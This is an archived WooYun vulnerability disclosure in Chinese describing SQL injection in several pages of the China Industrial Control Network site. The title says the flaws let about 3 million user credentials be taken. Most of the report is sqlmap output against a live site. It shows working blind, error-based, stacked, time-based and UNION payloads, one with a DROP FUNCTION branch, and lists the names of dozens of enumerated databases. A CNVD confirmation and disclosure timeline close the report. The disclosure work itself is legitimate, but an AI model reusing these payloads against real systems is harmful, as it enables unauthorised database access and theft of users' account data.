乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
中国工控网多处漏洞导致300万用户账号密码泄露可登陆(旺财谷经融)
http://**.**.**.**/SheYingPhotoContent.aspx?photoid=2012013016324000001
http://**.**.**.**/Ashx/Base/GetCompany.ashx?city=
http://**.**.**.**/customer/hite_20110815/energy_details.asp?id=2011090517235600003
http://**.**.**.**/customer/rockwell/com-detail.asp?id=2936
http://**.**.**.**/customer/photo/zpzs_hy_list.Asp?industryid=2012071311541500002
http://**.**.**.**/customer/photo/hjzp_user_detail.asp?Id=10926
sqlmap resumed the following injection point(s) from stored session:---Parameter: photoid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: photoid=2012013016324000001' AND 9243=9243 AND 'aoVa'='aoVa Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: photoid=2012013016324000001' AND 2346=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2346=2346) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113))) AND 'Irzr'='Irzr Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: photoid=2012013016324000001';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: photoid=2012013016324000001' WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: photoid=-1674' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(103)+CHAR(87)+CHAR(77)+CHAR(69)+CHAR(85)+CHAR(114)+CHAR(99)+CHAR(81)+CHAR(76)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[16:00:43] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[16:00:43] [INFO] fetching database names[16:00:44] [WARNING] the SQL query provided does not return any output[16:00:44] [WARNING] the SQL query provided does not return any output[16:00:44] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[16:00:44] [INFO] fetching number of databases[16:00:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[16:00:44] [INFO] retrieved:[16:00:45] [WARNING] time-based comparison requires larger statistical model, please wait.........................[16:01:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[16:01:22] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[16:01:25] [ERROR] unable to retrieve the number of databasesavailable databases [19]:[*] aspnetdb[*] blog[*] edc[*] exam[*] GkNetAid[*] GkRegUser[*] gkstudy[*] gksystem[*] gongkong_1[*] gongkonghelp[*] gongkongNet[*] gongkongnetpro[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] xuegongkong
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: id=2936;IF(1985=1985) SELECT 1985 ELSE DROP FUNCTION FJHb-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=2936;WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=2936 WAITFOR DELAY '0:0:5'---[16:07:37] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005[16:07:37] [INFO] fetching database names[16:07:37] [INFO] fetching number of databases[16:07:37] [INFO] resumed: 52[16:07:37] [INFO] resumed: ABB[16:07:37] [INFO] resumed: agongkong[16:07:37] [INFO] resumed: ase_050124[16:07:37] [INFO] resumed: caa[16:07:37] [INFO] resumed: cfpmia[16:07:37] [INFO] resumed: cus_2010_for_bb[16:07:37] [INFO] resumed: cus_abb[16:07:37] [INFO] resumed: cus_abb_BC[16:07:37] [INFO] resumed: custom[16:07:37] [INFO] resumed: custom_1[16:07:37] [INFO] resumed: forzdao[16:07:37] [INFO] resumed: GkCrm[16:07:37] [INFO] resumed: gkmall[16:07:37] [INFO] resumed: gknetdatanew[16:07:37] [INFO] resumed: gkoa[16:07:37] [INFO] resumed: gkreguser[16:07:37] [INFO] resumed: gkstat[16:07:37] [INFO] resumed: GkStudy[16:07:37] [INFO] resumed: gkstudynet[16:07:37] [INFO] resumed: gksystem[16:07:37] [INFO] resumed: gongkong[16:07:37] [INFO] resumed: gongkongcorp[16:07:37] [INFO] resumed: GongKongNet[16:07:37] [INFO] resumed: inquire[16:07:37] [INFO] resumed: kpi2012[16:07:37] [INFO] resumed: lndata_tmp[16:07:37] [INFO] resumed: LouKong[16:07:37] [INFO] resumed: master[16:07:37] [INFO] resumed: model[16:07:37] [INFO] resumed: msdb[16:07:37] [INFO] resumed: NBBS[16:07:37] [INFO] resumed: NDic[16:07:37] [INFO] resumed: NMessage[16:07:37] [INFO] resumed: NRegUser[16:07:37] [INFO] resumed: NRegUserDynamic[16:07:37] [INFO] resumed: NSys[16:07:37] [INFO] resumed: NSysLog[16:07:37] [INFO] resumed: nweblog[16:07:37] [INFO] resumed: opc_2009[16:07:37] [INFO] resumed: peCms[16:07:37] [INFO] resumed: Photography[16:07:37] [INFO] resumed: ReportServer[16:07:37] [INFO] resumed: ReportServerTempDB[16:07:37] [INFO] resumed: schneider_data[16:07:37] [INFO] resumed: SchneiderBBS[16:07:37] [INFO] resumed: siemensQuiz[16:07:37] [INFO] resumed: tempdb[16:07:37] [INFO] resumed: wap2011[16:07:37] [INFO] resumed: wapsubscribe[16:07:37] [INFO] resumed: xiugongkong[16:07:37] [INFO] resumed: xuegongkong[16:07:37] [INFO] resumed: youjiangavailable databases [52]:[*] ABB[*] agongkong[*] ase_050124[*] caa[*] cfpmia[*] cus_2010_for_bb[*] cus_abb[*] cus_abb_BC[*] custom[*] custom_1[*] forzdao[*] GkCrm[*] gkmall[*] gknetdatanew[*] gkoa[*] gkreguser[*] gkstat[*] GkStudy[*] gkstudynet[*] gksystem[*] gongkong[*] gongkongcorp[*] GongKongNet[*] inquire[*] kpi2012[*] lndata_tmp[*] LouKong[*] master[*] model[*] msdb[*] NBBS[*] NDic[*] NMessage[*] NRegUser[*] NRegUserDynamic[*] NSys[*] NSysLog[*] nweblog[*] opc_2009[*] peCms[*] Photography[*] ReportServer[*] ReportServerTempDB[*] schneider_data[*] SchneiderBBS[*] siemensQuiz[*] tempdb[*] wap2011[*] wapsubscribe[*] xiugongkong[*] xuegongkong[*] youjiang
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-10-30 17:37
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无